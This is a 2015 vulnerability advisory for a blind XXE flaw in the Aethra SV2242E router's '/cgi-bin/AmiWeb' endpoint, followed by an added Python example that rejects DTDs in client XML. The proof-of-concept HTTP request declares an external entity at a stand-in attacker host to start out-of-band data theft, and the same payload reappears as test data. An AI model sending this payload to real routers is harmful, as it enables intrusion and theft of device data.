Aethra SV2242E XXE Injection
Posted on 04 December 2015
# Author : Ahmed Sultan
# Email : 0x4148@gmail.com
# Vuln. software : Aethra SV2242E
# Vendor site : aethra.it
# CVE : Requested, but not yet assigned
# Tested on : ATOS 5.6.x

The bug arises because remote user input to "/cgi-bin/AmiWeb" is not sanitized before being parsed, which makes a blind XXE attack possible that might result in reading sensitive data from the router system.

Proof of concept:

POST /cgi-bin/AmiWeb HTTP/1.1
Content-type: application/xml
Host: ROUTER_IP
Content-Length: 155
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ATTACKER_IP/0x4148_jnk">
%remote;
%int;
%trick;]>

This results in an HTTP request to ATTACKER_IP/0x4148_jnk. Further exploitation might be done using OOB (out-of-band) XXE techniques to reach sensitive data on the server.
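As an added defensive example (not part of the advisory and not the vendor's code): the fix for this class of bug on an endpoint like "/cgi-bin/AmiWeb" is to refuse any DTD in client-supplied XML, which is the same policy defusedxml applies with forbid_dtd=True. This uses Python's standard-library expat parser; the sample bodies are constructed, with a placeholder host, and no network access is attempted.

```python
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a DTD or an external entity reference."""


def parse_untrusted_xml(data):
    """Parse XML from an untrusted client, refusing any DOCTYPE/DTD.

    Banning the DTD removes the only place where external and parameter
    entities can be declared, so a body shaped like the advisory's PoC is
    rejected before the parser could ever try to resolve "%remote;".
    Returns the element names seen, in document order.
    """
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE not allowed in client input: %r" % name)

    def on_external_entity(context, base, sysid, pubid):
        # Belt and braces: never fetch a SYSTEM/PUBLIC entity from the network.
        raise DoctypeRejected("external entity reference refused: %r" % sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(data, True)
    return elements


def is_acceptable(data):
    """True if the body parses with the DTD ban in force, False if rejected."""
    try:
        parse_untrusted_xml(data)
        return True
    except DoctypeRejected:
        return False


# Constructed sample bodies (placeholder host; nothing is fetched).
POC_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://ATTACKER_IP/0x4148_jnk">'
    ' %remote; ]>\n<root/>'
)
BENIGN_BODY = '<?xml version="1.0" encoding="utf-8"?><config><lan enabled="1"/></config>'

if __name__ == "__main__":
    print("PoC body accepted?", is_acceptable(POC_BODY))        # False
    print("benign body accepted?", is_acceptable(BENIGN_BODY))  # True
```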